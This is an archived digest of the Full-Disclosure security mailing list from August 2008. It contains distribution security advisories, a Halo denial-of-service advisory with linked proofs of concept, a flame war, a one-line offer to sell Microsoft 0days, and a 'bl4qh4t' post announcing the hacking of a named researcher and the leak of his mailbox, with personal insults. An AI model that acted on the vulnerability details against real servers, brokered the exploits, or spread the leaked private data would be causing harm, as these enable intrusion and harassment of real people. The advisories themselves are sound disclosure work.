http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.11.1-1ubuntu3.1_i386.deb Size/MD5: 927236 7c99672689c0695b0f12141a7e9dd065 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-x_1.1.11.1-1ubuntu3.1_i386.deb Size/MD5: 203452 f8fae04ac5a8b6f1b6d5cf5ee14fe57f http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.11.1-1ubuntu3.1_i386.deb Size/MD5: 1316 7561523b41ce407c7d33cfe5f5c3264d http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.11.1-1ubuntu3.1_i386.deb Size/MD5: 397678 4850f098a825220d592f49624cfcbaba http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.11.1-1ubuntu3.1_i386.deb Size/MD5: 14710 42f2ac1949591762d9abf6a938934638 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/x/xine-lib/libxine-dev_1.1.11.1-1ubuntu3.1_lpia.deb Size/MD5: 326900 0c3aac26a82156c26ed7056012dd53f8 http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-bin_1.1.11.1-1ubuntu3.1_lpia.deb Size/MD5: 1214152 399d31857cc4b03ef4eb62cbd6d75389 http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-console_1.1.11.1-1ubuntu3.1_lpia.deb Size/MD5: 58348 4395271b7fc56bd7e197cc5d650ad133 http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-dbg_1.1.11.1-1ubuntu3.1_lpia.deb Size/MD5: 3792624 fd75eb026979e8410c55fdc9741be0cd http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.11.1-1ubuntu3.1_lpia.deb Size/MD5: 927018 e5ed0c69767e7ef6f111648ef2f9f6f2 http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-x_1.1.11.1-1ubuntu3.1_lpia.deb Size/MD5: 203668 b3c3c6ede672556d1f7507c26b71cbff http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.11.1-1ubuntu3.1_lpia.deb Size/MD5: 1314 d8cb2c5cd9a584aa54970c4cbd754a0b http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.11.1-1ubuntu3.1_lpia.deb Size/MD5: 397504 169f96ace2ff50ea986921a38f4a3cc5 http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-gnome_1.1.11.1-1ubuntu3.1_lpia.deb Size/MD5: 14768 acbef6a6ef708a3367ec744e40885b44 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/x/xine-lib/libxine-dev_1.1.11.1-1ubuntu3.1_powerpc.deb Size/MD5: 326916 ac1f51d2b3536729e270172e112f99b9 http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-bin_1.1.11.1-1ubuntu3.1_powerpc.deb Size/MD5: 1226998 185654bca917da89a4fdd5b661b093b1 http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-console_1.1.11.1-1ubuntu3.1_powerpc.deb Size/MD5: 61302 068beafd328edab526eb3b66586b00c8 http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-dbg_1.1.11.1-1ubuntu3.1_powerpc.deb Size/MD5: 3985756 292cfac6f79d64b84f064c96f90126c9 http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.11.1-1ubuntu3.1_powerpc.deb Size/MD5: 1124358 e18a293fab38001767571b0d1627a9dd http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-x_1.1.11.1-1ubuntu3.1_powerpc.deb Size/MD5: 218352 8cda68f380fe22d9ded44a7a0c4b78fa http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.11.1-1ubuntu3.1_powerpc.deb Size/MD5: 1316 733af800ad9b472ca573fa66574342c2 http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.11.1-1ubuntu3.1_powerpc.deb Size/MD5: 426932 05c4a7157c7c1fb9e9c79f098f9b0ece http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-gnome_1.1.11.1-1ubuntu3.1_powerpc.deb Size/MD5: 21516 c1590ca1aae92c52ecdbe845fb74dedf sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/x/xine-lib/libxine-dev_1.1.11.1-1ubuntu3.1_sparc.deb Size/MD5: 326924 9c4036e955602e29a7b92ab8838f3d09 http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-bin_1.1.11.1-1ubuntu3.1_sparc.deb Size/MD5: 1210868 eda98d2aa5c57a467648dec0f8e44ebe http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-console_1.1.11.1-1ubuntu3.1_sparc.deb Size/MD5: 48608 6f98c13c2456fe85b6847fdc5af7c5ee http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-dbg_1.1.11.1-1ubuntu3.1_sparc.deb Size/MD5: 3595714 233f25bc320a3fd636144cacdbdab984 http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.11.1-1ubuntu3.1_sparc.deb Size/MD5: 943186 61d8ea0aa8ced899fbfef8664f9283cb http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-x_1.1.11.1-1ubuntu3.1_sparc.deb Size/MD5: 176208 a4f8907556c48180ed3ef33dd26ef031 http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.11.1-1ubuntu3.1_sparc.deb Size/MD5: 1312 3c61a2d623df5fc0aab974bf68310f30 http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.11.1-1ubuntu3.1_sparc.deb Size/MD5: 403464 f598723e1a1f9cd5389cf315c5d5ae18 http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-gnome_1.1.11.1-1ubuntu3.1_sparc.deb Size/MD5: 14594 d39a7503b13ccd49dd0829de0752c0a1 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/e60d8628/attachment.bin From jeffrey.starck at gmail.com Wed Aug 6 21:08:13 2008 From: jeffrey.starck at gmail.com (Jeffrey Starck) Date: Wed, 6 Aug 2008 22:08:13 +0200 Subject: [Full-disclosure] offering 0day Message-ID: Hi, I am offering Microsoft 0days : Windows, Office and also about some applications & services. Please contact me by email if interested. Jeffrey -- -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/a589ba9e/attachment.html From keytoaster at gentoo.org Wed Aug 6 21:16:35 2008 From: keytoaster at gentoo.org (Tobias Heinlein) Date: Wed, 06 Aug 2008 22:16:35 +0200 Subject: [Full-disclosure] [ GLSA 200808-05 ] ISC DHCP: Denial of Service Message-ID: <489A06A3.4050703@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: ISC DHCP: Denial of Service Date: August 06, 2008 Bugs: #227135 ID: 200808-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A Denial of Service vulnerability was discovered in ISC DHCP. Background ========== ISC DHCP is ISC's reference implementation of all aspects of the Dynamic Host Configuration Protocol. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/dhcp < 3.1.1 >= 3.1.1 Description =========== A buffer overflow error was found in ISC DHCP server, that can only be exploited under unusual server configurations where the DHCP server is configured to provide clients with a large set of DHCP options. Impact ====== A remote attacker could exploit this vulnerability to cause a Denial of Service. Workaround ========== There is no known workaround at this time. Resolution ========== All ISC DHCP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/dhcp-3.1.1" References ========== [ 1 ] CVE-2007-0062 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0062 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200808-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/783276b2/attachment.bin From keytoaster at gentoo.org Wed Aug 6 21:18:44 2008 From: keytoaster at gentoo.org (Tobias Heinlein) Date: Wed, 06 Aug 2008 22:18:44 +0200 Subject: [Full-disclosure] [ GLSA 200808-06 ] libxslt: Execution of arbitrary code Message-ID: <489A0724.4080308@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libxslt: Execution of arbitrary code Date: August 06, 2008 Bugs: #232172 ID: 200808-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== libxslt is affected by a heap-based buffer overflow, possibly leading to the execution of arbitrary code. Background ========== libxslt is the XSLT C library developed for the GNOME project. XSLT is an XML language to define transformations for XML. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-libs/libxslt < 1.1.24-r1 >= 1.1.24-r1 < 1.1.8 Description =========== Chris Evans (Google Security) reported that the libexslt library that is part of libxslt is affected by a heap-based buffer overflow in the RC4 encryption/decryption functions. Impact ====== A remote attacker could entice a user to process an XML file using a specially crafted XSLT stylesheet in an application linked against libxslt, possibly leading to the execution of arbitrary code with the privileges of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All libxslt users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libxslt-1.1.24-r1" References ========== [ 1 ] CVE-2008-2935 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2935 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200808-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/62b6dc1b/attachment.bin From bambenek.infosec at gmail.com Wed Aug 6 22:56:24 2008 From: bambenek.infosec at gmail.com (John C. A. Bambenek, GCIH, CISSP) Date: Wed, 6 Aug 2008 16:56:24 -0500 Subject: [Full-disclosure] [funsec] facebook messages worm In-Reply-To: References: Message-ID: What's the infection vector? URL Link? Rouge Facebook app? On Wed, Aug 6, 2008 at 4:44 PM, Gadi Evron wrote: > Hi all. > > There's a facebook (possibly worm) something malicious sending fake > messages from real users (friends). > > The sample also has a remote drop site (verified by someone who shall > remain nameless). > > This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help. > > Infection sites seen so far are on .pl domains. > > The AV industry will soon add detection. > Facebook's security folks are very capable, so I am not worried on that > front. > > It's not that we didn't expect this for a long time now, but... > Be careful. Some users know to be careful in email.. but not on facebook. > > Note: unlike 2003 when we called everything a worm and the 90s when > everything was a virus--this is a bot which also spreads/infects on > facebook. > > Gadi. > > > -- > "You don't need your firewalls! Gadi is Israel's firewall." > -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the > Accountant General, > Israel's Ministry of Finance, at the government's CIO conference, > 2005. > > (after two very funny self-deprication quotes, time to even things up!) > > My profile and resume: > http://www.linkedin.com/in/gadievron > _______________________________________________ > Fun and Misc security discussion for OT posts. > https://linuxbox.org/cgi-bin/mailman/listinfo/funsec > Note: funsec is a public and open mailing list. > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/6e0cee28/attachment.html From aluigi at autistici.org Thu Aug 7 00:00:31 2008 From: aluigi at autistici.org (Luigi Auriemma) Date: Thu, 7 Aug 2008 00:00:31 +0100 Subject: [Full-disclosure] Endless loop and resources consumption in Halo 1.0.7.0615 Message-ID: <20080807000031.d7c7a135.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: Halo: Combat Evolved http://www.microsoft.com/games/pc/halo.aspx Versions: <= 1.0.7.0615 (before 30 Jul 2008) Platforms: Windows Bugs: A] endless loop B] resources consumption Exploitation: remote, versus server Date: 06 Aug 2008 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Halo is the great FPS game developed by Bungie Studios and ported on PC by Gearbox Software (http://www.gearboxsoftware.com). Although it has been released at the end of 2003, it's still one of the most played games with hundreds of internet servers. ####################################################################### ======= 2) Bugs ======= --------------- A] endless loop --------------- The Halo server is affected by a problem in the handling of a type of packet which can cause the bypassing of a check used to avoid the reading of data outside the packet. The result is an endless loop which freezes the application with CPU at 100%. ------------------------ B] resources consumption ------------------------ When a client occupies the player's slot after joininig the match, the Halo server continues to send packets to it forever because it stops only if an ICMP "destination unreachable" or a disconnection packet is received (doesn't exist a timeout, this is the cause of the problem). This has been tested personally by me and after a week I was still receiving these packets because many servers have firewalls which block ICMP and so there is no way to stop this problem except restarting the server. If the player has not occupied the slot yet (so before the handshake performed by the Gamespy SDK), the sending of packets made by the server is only 60 seconds long. So if an attacker has disabled the outgoing ICMP packets, which is default on any Windows with the firewall activated, he can consume a part of the network bandwidth of the server and mainly its memory with the consequent possible crash or hanging of the application. Note that, as already said, a handshake is required for occupying the slot so is not possible to spoof the packets which instead is possible for the second method of the 60 seconds. ####################################################################### =========== 3) The Code =========== A] http://aluigi.org/poc/haloloop3.zip B] http://aluigi.org/poc/halonso.zip ####################################################################### ====== 4) Fix ====== The hotfix released the 30th July 2008 solves these problems. Note that this hotfix has the same version number of the previous one released a month before for the haloloop2 bug: 1.0.7.0615. ####################################################################### --- Luigi Auriemma http://aluigi.org http://backup.aluigi.org http://mirror.aluigi.org From pschmehl_lists at tx.rr.com Wed Aug 6 23:13:52 2008 From: pschmehl_lists at tx.rr.com (Paul Schmehl) Date: Wed, 06 Aug 2008 17:13:52 -0500 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: <008001c8f7fc$ba7afa20$2f70ee60$@com> References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com> <008001c8f7fc$ba7afa20$2f70ee60$@com> Message-ID: Insanity == doing the same thing repeatedly and expecting a different result. If this is true, then Insane == responding to n3td3v. So how many on this list meet the definition of insane? --On Wednesday, August 06, 2008 15:43:39 -0400 TJ wrote: > Note that the costs being discussed were purely financial, and you rushed > headlong into adding human lives. > That is, to be polite (if blunt) - wrong. > > The "cost" conversation is actually how real decisions are made, in the real > world. > > > > /TJ > > >> -----Original Message----- >> From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure- >> bounces at lists.grok.org.uk] On Behalf Of n3td3v >> Sent: Tuesday, August 05, 2008 3:36 PM >> To: full-disclosure at lists.grok.org.uk >> Subject: Re: [Full-disclosure] Media backlash begins against HD Moore and >> I)ruid >> >> On Tue, Aug 5, 2008 at 7:57 PM, wrote: >>> On Tue, 05 Aug 2008 18:40:32 BST, n3td3v said: >>> >>>> Are you suggesting HD Moore had prior knowledge that the Austin Texas >>>> AT&T servers were vulnerable? >>> >>> No - simply saying that either they were vulnerable, or they weren't. >>> If they weren't vulnerable, HD didn't have to do anything. And even >>> if they *were*, somebody would still have to actually *attack* them. >>> >>> And even if they *got* attacked, it's quite possible that the upsides >>> of not bothering to do something outweighed the risks. If you >>> estimate that the cost (including "things you could have spent your >>> time doing") is more than the losses, why bother? "Even if we *got* >>> whacked, we'd lose maybe $500. But in the time I'd waste dealing with >>> the issue, I could generate something that will get us $2,000 in >>> revenue. So if I fix it, I lose $1500, and if I ignore it, I come out >> $1,500 ahead if we get hit, and $2,000 if we don't". >>> >> >> Is what you're describing not against the law Valdis, it sure sounds like > it >> to me. Some kind of gross negligence... >> >> http://legal-dictionary.thefreedictionary.com/Gross+negligence >> http://legal-dictionary.thefreedictionary.com/negligence >> >> Is this what goes on at Virginia Tech on a regular basis? Maybe the >> authorities should be looking into you a lot more while they are looking >> into HD Moore. ;) >> >> I wonder if the the intelligence services thought like you before 9/11 and >> 7/7 eh...I get the feeling they did. >> >> For sure people like you who support this kind of activity should be >> investigated. It sounds criminal. >> >> Have you ever carried out this kind of activity Valdis where you put >> security and people at risk to make and/or save money? >> >> If cyber-terrorism is going to become a real threat, we don't need people >> like Valdis around and we should sure keep track of him. >> >> Would you allow a cyber-9-11 to happen Valdis if there was money involved? >> I'm starting to become worried about you dude, maybe I should be e-mailing >> the folks at Virginia Tech this thread, and perhaps, just perhaps the F.B.I >> and see what they think about what you've just told me. >> >> You seem to be normalizing what you've just described to me as normal run- >> of-the-mill legal activity, when it clearly isn't. >> >> To me what you've just described is illegal, criminal and wrong. >> >> All the best, >> >> n3td3v >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. ******************************************* Check the headers before clicking on Reply. From trejrco at gmail.com Wed Aug 6 23:56:09 2008 From: trejrco at gmail.com (TJ) Date: Wed, 6 Aug 2008 18:56:09 -0400 Subject: [Full-disclosure] Media backlash ... insane? In-Reply-To: References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com> <008001c8f7fc$ba7afa20$2f70ee60$@com> Message-ID: <00e201c8f817$9f0a5590$dd1f00b0$@com> I'd take offense, except for that annoying ring of truth ... Anyway, I like to think of it more as trying to add value to an ongoing conversation (vs anything insane). /TJ >-----Original Message----- >From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure- >bounces at lists.grok.org.uk] On Behalf Of Paul Schmehl >Sent: Wednesday, August 06, 2008 6:14 PM >To: full-disclosure at lists.grok.org.uk >Subject: Re: [Full-disclosure] Media backlash begins against HD Moore and >I)ruid > >Insanity == doing the same thing repeatedly and expecting a different >result. > >If this is true, then > >Insane == responding to n3td3v. > >So how many on this list meet the definition of insane? > >--On Wednesday, August 06, 2008 15:43:39 -0400 TJ wrote: > >> Note that the costs being discussed were purely financial, and you >> rushed headlong into adding human lives. >> That is, to be polite (if blunt) - wrong. >> >> The "cost" conversation is actually how real decisions are made, in >> the real world. >> >> >> >> /TJ >> >> >>> -----Original Message----- >>> From: full-disclosure-bounces at lists.grok.org.uk >>> [mailto:full-disclosure- bounces at lists.grok.org.uk] On Behalf Of >>> n3td3v >>> Sent: Tuesday, August 05, 2008 3:36 PM >>> To: full-disclosure at lists.grok.org.uk >>> Subject: Re: [Full-disclosure] Media backlash begins against HD Moore >>> and I)ruid >>> >>> On Tue, Aug 5, 2008 at 7:57 PM, wrote: >>>> On Tue, 05 Aug 2008 18:40:32 BST, n3td3v said: >>>> >>>>> Are you suggesting HD Moore had prior knowledge that the Austin >>>>> Texas AT&T servers were vulnerable? >>>> >>>> No - simply saying that either they were vulnerable, or they weren't. >>>> If they weren't vulnerable, HD didn't have to do anything. And even >>>> if they *were*, somebody would still have to actually *attack* them. >>>> >>>> And even if they *got* attacked, it's quite possible that the >>>> upsides of not bothering to do something outweighed the risks. If >>>> you estimate that the cost (including "things you could have spent >>>> your time doing") is more than the losses, why bother? "Even if we >>>> *got* whacked, we'd lose maybe $500. But in the time I'd waste >>>> dealing with the issue, I could generate something that will get us >>>> $2,000 in revenue. So if I fix it, I lose $1500, and if I ignore >>>> it, I come out >>> $1,500 ahead if we get hit, and $2,000 if we don't". >>>> >>> >>> Is what you're describing not against the law Valdis, it sure sounds >>> like >> it >>> to me. Some kind of gross negligence... >>> >>> http://legal-dictionary.thefreedictionary.com/Gross+negligence >>> http://legal-dictionary.thefreedictionary.com/negligence >>> >>> Is this what goes on at Virginia Tech on a regular basis? Maybe the >>> authorities should be looking into you a lot more while they are >>> looking into HD Moore. ;) >>> >>> I wonder if the the intelligence services thought like you before >>> 9/11 and >>> 7/7 eh...I get the feeling they did. >>> >>> For sure people like you who support this kind of activity should be >>> investigated. It sounds criminal. >>> >>> Have you ever carried out this kind of activity Valdis where you put >>> security and people at risk to make and/or save money? >>> >>> If cyber-terrorism is going to become a real threat, we don't need >>> people like Valdis around and we should sure keep track of him. >>> >>> Would you allow a cyber-9-11 to happen Valdis if there was money >involved? >>> I'm starting to become worried about you dude, maybe I should be >>> e-mailing the folks at Virginia Tech this thread, and perhaps, just >>> perhaps the F.B.I and see what they think about what you've just told me. >>> >>> You seem to be normalizing what you've just described to me as normal >>> run- of-the-mill legal activity, when it clearly isn't. >>> >>> To me what you've just described is illegal, criminal and wrong. >>> >>> All the best, >>> >>> n3td3v >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > >-- >Paul Schmehl, Senior Infosec Analyst >As if it wasn't already obvious, my opinions are my own and not those of my >employer. >******************************************* >Check the headers before clicking on Reply. > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ From hdw at kallisti.se Thu Aug 7 00:31:34 2008 From: hdw at kallisti.se (Anders B Jansson) Date: Thu, 07 Aug 2008 01:31:34 +0200 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com> <008001c8f7fc$ba7afa20$2f70ee60$@com> Message-ID: <489A3456.8010001@kallisti.se> Paul Schmehl wrote: > Insane == responding to n3td3v. > > So how many on this list meet the definition of insane? > Everyone. -- // hdw From pinar at pardus.org.tr Thu Aug 7 01:27:31 2008 From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=) Date: Thu, 07 Aug 2008 03:27:31 +0300 Subject: [Full-disclosure] [PLSA 2008-18] Pidgin: Spoofing Vulnerability Message-ID: <489A4173.4030209@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-18 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-08-07 Severity: 2 Type: Remote ------------------------------------------------------------------------ Summary ======= A security issue has been reported in Pidgin, which can be exploited by malicious people to conduct spoofing attacks. Description =========== The problem is that the certificate presented by e.g. a Jabber server at the beginning of an SSL session is not verified. This can be exploited to spoof valid servers via a man-in-the-middle attack. Successful exploitation requires that Pidgin is configured to use the NSS plugin. Affected packages: Pardus 2008: pidgin, all before 2.4.3-21-3 Pardus 2007: pidgin, all before 2.4.3-21-14 Resolution ========== There are update(s) for pidgin. You can update them via Package Manager or with a single command from console: Pardus 2008: pisi up pidgin Pardus 2007: pisi up pidgin References ========== * http://secunia.com/advisories/31390/ * http://developer.pidgin.im/ticket/6500 ------------------------------------------------------------------------ -- P?nar Yanarda? http://pinguar.org From pinar at pardus.org.tr Thu Aug 7 01:27:43 2008 From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=) Date: Thu, 07 Aug 2008 03:27:43 +0300 Subject: [Full-disclosure] [PLSA 2008-19] Git: Multiple Buffer Overflows Message-ID: <489A417F.5060200@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-19 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-08-07 Severity: 2 Type: Remote ------------------------------------------------------------------------ Summary ======= Some vulnerabilities have been reported in GIT, which can potentially be exploited by malicious people to compromise a user's system. Description =========== The vulnerabilities are caused due to boundary errors in various functions when processing overly long repository pathnames. These can be exploited to cause stack-based buffer overflows by tricking a user into running e.g. "git-diff" or "git-grep" against a repository containing pathnames that are larger than the "PATH_MAX" value on the user's system. Successful exploitation may allow execution of arbitrary code. Affected packages: Pardus 2008: git, all before 1.5.6.4-66-3 git-emacs, all before 1.5.6.4-66-3 gitweb, all before 1.5.6.4-66-3 Pardus 2007: git, all before 1.5.6.4-66-51 git-emacs, all before 1.5.6.4-66-25 gitweb, all before 1.5.6.4-66-27 Resolution ========== There are update(s) for git, git-emacs, gitweb. You can update them via Package Manager or with a single command from console: Pardus 2008: pisi up git git-emacs gitweb Pardus 2007: pisi up git git-emacs gitweb References ========== * http://www.kernel.org/pub/software/scm/git/docs/RelNotes-1.5.6.4.txt * http://kerneltrap.org/mailarchive/git/2008/7/16/2529284 * http://secunia.com/advisories/31347/ ------------------------------------------------------------------------ -- P?nar Yanarda? http://pinguar.org From internetsuperheros at hushmail.com Thu Aug 7 01:41:55 2008 From: internetsuperheros at hushmail.com (internetsuperheros at hushmail.com) Date: Thu, 07 Aug 2008 02:41:55 +0200 Subject: [Full-disclosure] Petko D. Petkov files unleashed, guilty by Internet council Message-ID: <20080807004156.BCD5711803C@mailserver5.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 bl4qh4t l1b3r4t10n 4rmy presents: the pdp files =============================================== The Great Council of Internet Superheros, with help of bl4qh4t l1b3r4t10n 4rmy commandos, has condemned Petko D. Petkov to public exposure, continuous siege and compromise of his electronic and networked assets. Petko D. Petkov has been accused and declared guilty of several crimes against God, Humankind, Honor, the Queen and his Mother (wherever her grave is located in Poland): 01. Extreme media and press whoring. 02. Flagrant behavior and lack of discretion and respect for the spirit and tradition of hacking. 03. Claiming hacker status. 04. Pretending to be ethical while conducting illegal and morally questionable behavior. 05. Cheating on his anorexic, sex-starved girlfriend. 06. Excessive mailbox usage and size (Note: we are superheros but we don't like to archive 2GB mailbox files. Next time make it easier and help us by cleaning up a bit). 07. Animal cruelty (killing bugs and selling them to ZDI and iDEFENSE). 08. Waste of public and Internet resources. 09. Using the hacker word for self-promotion and advertisement with commercial intent. 10. Attacking and mis-using the meaning of 0-day. 11. Exceeding the limit of mailing-list subscibrals and monthly post quotas set by the Government of the Internet Chamber of Commerce and Etcetera. The Great Council of Internet Superheros is now actively researching and investigating several security industry personalities for other suspected crimes. In the weeks and months to come, other individuals might be judged and accused of these dispicable activities. We will strike with greate vengeance and furious anger those who attempt to attack, discredit and offend our brothers. Using our amassed amounts of awesomeness, super powers and truely useful 0day, there will be no single networked machine capable of withstanding our acts of justice. Oh we say. Now get the mailbox files and mirror them, son. .<@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>. .<@@@@@@ $$$$$$$$$$$$$$$$$$$$$\^^^^^^/$$$$@@@>. .<@@@@@< .$$$$$'~ '~'$$$$$$$\ /$$$$$$>@@@@@>. .<@@@@@<' o$$$$$$ `'$$$$$$$$$$$$ '>@@@@@>. .<@@@@@<' o$$$$$$oo. )$$$$$$$$$$ '>@@@@@>. '<@@@@@< o$$$$$$$$$$$. >@@@@@>' '<@@@@< o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$oooooo... >@@@@>' 